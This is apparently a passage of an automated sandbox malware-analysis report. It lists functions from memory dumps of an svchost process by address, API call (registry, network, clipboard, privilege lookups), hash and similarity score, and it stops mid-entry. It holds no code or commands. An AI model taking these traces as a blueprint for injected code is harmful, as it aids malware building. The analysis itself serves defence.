                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 5585b11bca3f11dc31fab04191abb6b2b404ed0889319a6a32a5f3ae77e33c31
                                                                        • Instruction ID: 5ee0fff8c1777932281cc4a529e9714c7d6bfed68b7a055cee3a33de15db69f3
                                                                        • Opcode Fuzzy Hash: 5585b11bca3f11dc31fab04191abb6b2b404ed0889319a6a32a5f3ae77e33c31
                                                                        • Instruction Fuzzy Hash: ED11D6755097406FE721CB11DC85FA7FFB8DF45720F08809AF9449B292D374A948CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB40E Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BB480
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: d0379a2c8c090cd861a0dc800acd04c0bfa317a6655be253a0776b567cae07e6
                                                                        • Instruction ID: bc21fda8bd6a5a8fbbf702166600c5b095304dfc8f68aac2cb1eddfcefe3428d
                                                                        • Opcode Fuzzy Hash: d0379a2c8c090cd861a0dc800acd04c0bfa317a6655be253a0776b567cae07e6
                                                                        • Instruction Fuzzy Hash: 5E118E76500604AFE721CE15DC85FA7FBECEF04614F08849AEE459AB52EB74E448CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653092A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 0653099C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 1a1565cb453a1016a0671dc1c75b7fac65cefeac3613017dae533b66f4d07a61
                                                                        • Instruction ID: b78d5341687b1a6de4e6ce6d496da9721e3fa9fe6146668b159534f594907557
                                                                        • Opcode Fuzzy Hash: 1a1565cb453a1016a0671dc1c75b7fac65cefeac3613017dae533b66f4d07a61
                                                                        • Instruction Fuzzy Hash: 37118176900704AFE761CF15DC84FA7F7E8EF04A24F08845AE9459B792D774E508CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06531132 Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcessTimes.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06531191
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessTimes
                                                                        • String ID:
                                                                        • API String ID: 1995159646-0
                                                                        • Opcode ID: 548be75eb2c19be5dad6ddb9b04c9beb5cadf2c4a39c50a0a341b1f44086b6dd
                                                                        • Instruction ID: efecbcfd76e4449fe849bbd226fb253d9e8a05117be850917a45acca35a81fd3
                                                                        • Opcode Fuzzy Hash: 548be75eb2c19be5dad6ddb9b04c9beb5cadf2c4a39c50a0a341b1f44086b6dd
                                                                        • Instruction Fuzzy Hash: 0611D072500600AFEB218F65DC84FABBBA8EF04624F08886AE9458A655D774E508CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA61E Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 033BA690
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: f013b2fa5e187afe15affe431d2af272c0460dfd1f4fbae7871aaeb6351402c4
                                                                        • Instruction ID: d63161cd81fbddf471783a2267b5dd224fd62f33388e57f7c14bfe795745476e
                                                                        • Opcode Fuzzy Hash: f013b2fa5e187afe15affe431d2af272c0460dfd1f4fbae7871aaeb6351402c4
                                                                        • Instruction Fuzzy Hash: 202138754093C09FDB128B25DC95792BFB4DF07220F0984DAE9849F2A7D265A908DBB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653280A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetProcessWorkingSetSize.KERNEL32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06532863
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSizeWorking
                                                                        • String ID:
                                                                        • API String ID: 3584180929-0
                                                                        • Opcode ID: ed718ac26cab220c97a2fa6384836c2a18397c9c17e8cbd7d9fa88b386c80b50
                                                                        • Instruction ID: c55225bf8d7154377f9e83882cb7703d6dabbe1ac6855dd9fa0010a5d8719ed5
                                                                        • Opcode Fuzzy Hash: ed718ac26cab220c97a2fa6384836c2a18397c9c17e8cbd7d9fa88b386c80b50
                                                                        • Instruction Fuzzy Hash: 6111BF72900700AFEB208F15DC84BABF7A8EF44624F18846AE905DB755D774E6088AB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06532726 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcessWorkingSetSize.KERNEL32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 0653277F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSizeWorking
                                                                        • String ID:
                                                                        • API String ID: 3584180929-0
                                                                        • Opcode ID: ed718ac26cab220c97a2fa6384836c2a18397c9c17e8cbd7d9fa88b386c80b50
                                                                        • Instruction ID: bfa31cd3bd7bf5b1d82c99492548c873ef5a30e5485a73146aeec2675742bcad
                                                                        • Opcode Fuzzy Hash: ed718ac26cab220c97a2fa6384836c2a18397c9c17e8cbd7d9fa88b386c80b50
                                                                        • Instruction Fuzzy Hash: 8D11C171500600AFEB20CF25DC84FABB7A8EF04724F08886AE945DB755D774E508CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA573 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 033BA5DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 5bd05024a619876b169acad6dbc8347246252cef909cd60b3c96c2f1698d3a78
                                                                        • Instruction ID: b1f9ad93ca468b0ea626dc93d7ed740df8f56f28e92640203bbe629b1f27efdf
                                                                        • Opcode Fuzzy Hash: 5bd05024a619876b169acad6dbc8347246252cef909cd60b3c96c2f1698d3a78
                                                                        • Instruction Fuzzy Hash: 30118471409780AFDB228F51DC44B62FFF8EF4A310F0888DEEE858B562D275A518DB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653264A Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetExitCodeProcess.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 065326A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CodeExitProcess
                                                                        • String ID:
                                                                        • API String ID: 3861947596-0
                                                                        • Opcode ID: 5edad6f2baec48d27671f2daa0a685ca89d431b85a3832a1bd28a71dcd80c422
                                                                        • Instruction ID: a2891558c5ed2ed6c104c84439daf0d63d272e90595c87102130b1147cc7c158
                                                                        • Opcode Fuzzy Hash: 5edad6f2baec48d27671f2daa0a685ca89d431b85a3832a1bd28a71dcd80c422
                                                                        • Instruction Fuzzy Hash: 82110A715046009FE710CF15DC44BABB7D8EF44624F04846AED04DF755D774E908CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BAEAE Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BAF0D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1d82917fff13a62a58e38cdb837cb6041a83bbeac4b0178acf5b96c978158e18
                                                                        • Instruction ID: 2d0fdd395643a7165e8c71c4c472ce557917cac5783676ec968d8ebac38264f6
                                                                        • Opcode Fuzzy Hash: 1d82917fff13a62a58e38cdb837cb6041a83bbeac4b0178acf5b96c978158e18
                                                                        • Instruction Fuzzy Hash: F311D071504600AEEB21CF51DC84FAABBA8EF04214F08849AEA449AA55D374A5088BB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653219E Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ioctlsocket.WS2_32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 065321F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ioctlsocket
                                                                        • String ID:
                                                                        • API String ID: 3577187118-0
                                                                        • Opcode ID: 3cc4dcaef37d7ae83570949b602940f75be086ad281f126876a53a4b7880814e
                                                                        • Instruction ID: 471f16c595d575eee786a22ebbcefa0473d2940858a622a7d7744324f6646699
                                                                        • Opcode Fuzzy Hash: 3cc4dcaef37d7ae83570949b602940f75be086ad281f126876a53a4b7880814e
                                                                        • Instruction Fuzzy Hash: BA11E371904600AFE720CF51DC44FABF7A8EF04724F08846AEE049B755D374A608CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06530E6A Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • shutdown.WS2_32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06530EC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: shutdown
                                                                        • String ID:
                                                                        • API String ID: 2510479042-0
                                                                        • Opcode ID: 29afbac98fba943488876c90eb1f4d8fb223d5ba6589b0690fa9d087f2f18273
                                                                        • Instruction ID: 5cdb7f255d6ef826024972c01cfb0751a523c5bec756a5d99615a5e505d2edf0
                                                                        • Opcode Fuzzy Hash: 29afbac98fba943488876c90eb1f4d8fb223d5ba6589b0690fa9d087f2f18273
                                                                        • Instruction Fuzzy Hash: 0211C671504350AEEB10CF15DC84BABB798EF44724F088496ED049B795D779A5088AB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065316AA Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE(?,00000E24), ref: 06531713
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: be4f4cb71280f7219a3a3aea6bddd0fd366dd17885013d88468ea69385ea0ba4
                                                                        • Instruction ID: 6f493bfa6d7cb738de8e23c98fe609c2a3355682893eb1e0e04e519972526901
                                                                        • Opcode Fuzzy Hash: be4f4cb71280f7219a3a3aea6bddd0fd366dd17885013d88468ea69385ea0ba4
                                                                        • Instruction Fuzzy Hash: BE11E571504600AEF7208B25DC85FB6F7A8EF04724F188099ED045A795D7B4A508CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653227A Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: select
                                                                        • String ID:
                                                                        • API String ID: 1274211008-0
                                                                        • Opcode ID: fc8f01c37f825d55e48945317948d1d3c012c1fcf5e9d2b8da0330f2fb85e563
                                                                        • Instruction ID: 9ed9e17a672472f6bedd8bdafe23701535f02d7845719cf5d02ad18574a27a37
                                                                        • Opcode Fuzzy Hash: fc8f01c37f825d55e48945317948d1d3c012c1fcf5e9d2b8da0330f2fb85e563
                                                                        • Instruction Fuzzy Hash: 41115E755006008FEB60CF55DD84B66F7E8FF08A10F0884AAED49CB651D370E508CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653234E Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 06532396
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: d8f9fa78877e8e390e10d63ba97f8f5acf426337750e8a5a798da748684aff04
                                                                        • Instruction ID: 09dafd9ce976e6c0b2903def6990d5e4cf6d81202b93826af0db85c6c90591af
                                                                        • Opcode Fuzzy Hash: d8f9fa78877e8e390e10d63ba97f8f5acf426337750e8a5a798da748684aff04
                                                                        • Instruction Fuzzy Hash: 2011A571A046409FEB60CF15D884766FBD8EF04620F0884AADC45CB751D775E544CE61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BAC6A Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileType.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BACBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileType
                                                                        • String ID:
                                                                        • API String ID: 3081899298-0
                                                                        • Opcode ID: f406ac32bc21f261a15612f3af654b7acf5d915570e088148bde89201738fc9f
                                                                        • Instruction ID: 40e2cfea84ed36e29dbc5f6a6b63106e87548e14cd4d26e02a4601f17db88451
                                                                        • Opcode Fuzzy Hash: f406ac32bc21f261a15612f3af654b7acf5d915570e088148bde89201738fc9f
                                                                        • Instruction Fuzzy Hash: B201C071504604AFE720CB05DC84BABB7ACDF04624F18C09AEE049BB55E778E508CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065313FE Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0653144A
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Connect
                                                                        • String ID:
                                                                        • API String ID: 3144859779-0
                                                                        • Opcode ID: 3d7da1f6e242eafe96abd643a523b86e988d1d8b3c62832040cece75daef73d7
                                                                        • Instruction ID: b0a2cc62b81d783cb1ef395e5aa9acb7668590f4c3ceec4eeb38a2792546ee6f
                                                                        • Opcode Fuzzy Hash: 3d7da1f6e242eafe96abd643a523b86e988d1d8b3c62832040cece75daef73d7
                                                                        • Instruction Fuzzy Hash: CF1170755006409FEB70CF55D844B66FBE4FF08614F08889ADD858B622D375E518DF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA59A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 033BA5DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 53701f83ed44212848b81b84a94cf197edbdbd4cbfa339658f096eebd91504dd
                                                                        • Instruction ID: 9e9c6d3e732207d72f29e97d09ba160458514d8b044545bfa2872cbd19ca1861
                                                                        • Opcode Fuzzy Hash: 53701f83ed44212848b81b84a94cf197edbdbd4cbfa339658f096eebd91504dd
                                                                        • Instruction Fuzzy Hash: 1B01A1715006409FDB20CF55D884B66FFF4EF08310F08889ADE854AA21C376E518DF62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BABBE Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 033BABF0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: cf9255477c5c97e53e36d92cb5ab0629e45fc1e10c9c3f74c8ab6e7591e55e4d
                                                                        • Instruction ID: 6ccacb1e6aac82650da1b3296a50e9f962bda16869ceb0c4fe037a6adb7eb4a6
                                                                        • Opcode Fuzzy Hash: cf9255477c5c97e53e36d92cb5ab0629e45fc1e10c9c3f74c8ab6e7591e55e4d
                                                                        • Instruction Fuzzy Hash: D8018F759046449FEB10CF19E8857AAFBE8DF04220F08C4ABDD49CBB56D675E508CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA72E Relevance: 1.5, APIs: 1, Instructions: 43comclipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleGetClipboard.OLE32(?,00000E24,?,?), ref: 033BA77E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard
                                                                        • String ID:
                                                                        • API String ID: 220874293-0
                                                                        • Opcode ID: 58c78c0953ef27dcdb30f915765e82c416330cb990ca9ab8de628e3769b195d9
                                                                        • Instruction ID: 952b121eddeb46a8eb8d858a7f0f94adf18bf660091d01c87168924690e1b967
                                                                        • Opcode Fuzzy Hash: 58c78c0953ef27dcdb30f915765e82c416330cb990ca9ab8de628e3769b195d9
                                                                        • Instruction Fuzzy Hash: 4901D671500600ABD310DF16DC86B66FBE8FB88A20F148159EC089BB41E735F915CBE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065304D6 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 06530526
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: cbb466303549ec42c80a41592ace06f66968b75ea9849d5df8c182e712217976
                                                                        • Instruction ID: 3dffbdaf1dd4b7f1c52b0b451cfed04ecbb1e1f64587de0b73b9e0c8f51d8ad7
                                                                        • Opcode Fuzzy Hash: cbb466303549ec42c80a41592ace06f66968b75ea9849d5df8c182e712217976
                                                                        • Instruction Fuzzy Hash: 0C01D671500600ABD310DF16DC86B66FBE8FB88B20F14815AEC089BB42E775F925CBE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA186 Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: send
                                                                        • String ID:
                                                                        • API String ID: 2809346765-0
                                                                        • Opcode ID: dd26c127d998d83cd13974bf3086a310f7bdb7a12367c1fad74ce2bc0108958a
                                                                        • Instruction ID: e3b1258b06be387e929bb52bc678b0403aada1902054e544a4a4b5d2df00c2fc
                                                                        • Opcode Fuzzy Hash: dd26c127d998d83cd13974bf3086a310f7bdb7a12367c1fad74ce2bc0108958a
                                                                        • Instruction Fuzzy Hash: 0C01B131804640DFDB60CF55DC84BA6FBF4EF08320F08C49ADE498BA16D376A408DBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB73A Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WaitForInputIdle.USER32(?,?), ref: 033BB76F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: IdleInputWait
                                                                        • String ID:
                                                                        • API String ID: 2200289081-0
                                                                        • Opcode ID: 14b800076af509c6806e5cd5e2bc7394c3fd2e421ff52ebbc743cf24b8aee2f5
                                                                        • Instruction ID: 0fb85e7e2687a71f5e006f1de128b4e5fc56cd5b5c14fd33b2eed0141f346be3
                                                                        • Opcode Fuzzy Hash: 14b800076af509c6806e5cd5e2bc7394c3fd2e421ff52ebbc743cf24b8aee2f5
                                                                        • Instruction Fuzzy Hash: C9018F759042409FEB10CF15DC85BA6FBE4EF08220F0CC4AAEE498FB56D775E508CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA65E Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 033BA690
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 19c6777ed26932fabcca5f1518a2c5dba149a59453726111e58b64df5d24707d
                                                                        • Instruction ID: a1c73669e04f40588827ed9bda1a26fe8f1a6772f6fe77dc31bcbbd8ee7bd0c4
                                                                        • Opcode Fuzzy Hash: 19c6777ed26932fabcca5f1518a2c5dba149a59453726111e58b64df5d24707d
                                                                        • Instruction Fuzzy Hash: 9C01D6B19046409FDB10CF15D8847A6FBE8DF04220F0CC4EADD488FB66D375A508CEA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC7190 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2(l
                                                                        • API String ID: 0-367637329
                                                                        • Opcode ID: 6a3c997635063b9bb8da5c257b2b3e71c4177d4302c7e2ed0bd21354bbc08a27
                                                                        • Instruction ID: ab1cb7c9342c579038f40667b277cfa2157601b9256f344954c0e110376c0abd
                                                                        • Opcode Fuzzy Hash: 6a3c997635063b9bb8da5c257b2b3e71c4177d4302c7e2ed0bd21354bbc08a27
                                                                        • Instruction Fuzzy Hash: 41A1BD316042158BEB14DF36D984BAD3AE2FB84314F148AADE8129B7D0DF39DD468F50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BAA12 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(?), ref: 033BAA44
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 131a4b20929b9c3df4174cd5d526dbb344dbe798837c3d04638d7704ba6d65eb
                                                                        • Instruction ID: e0fabf6d6cd22a410841c62cfd4dd94365bbe39864e347a9ec12cb8f93ad32c2
                                                                        • Opcode Fuzzy Hash: 131a4b20929b9c3df4174cd5d526dbb344dbe798837c3d04638d7704ba6d65eb
                                                                        • Instruction Fuzzy Hash: F8F08C35804680DFDB20CF05D9847A6FBE4EF04624F08C0DADE494BB66D3B9A508CEB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC39BF Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
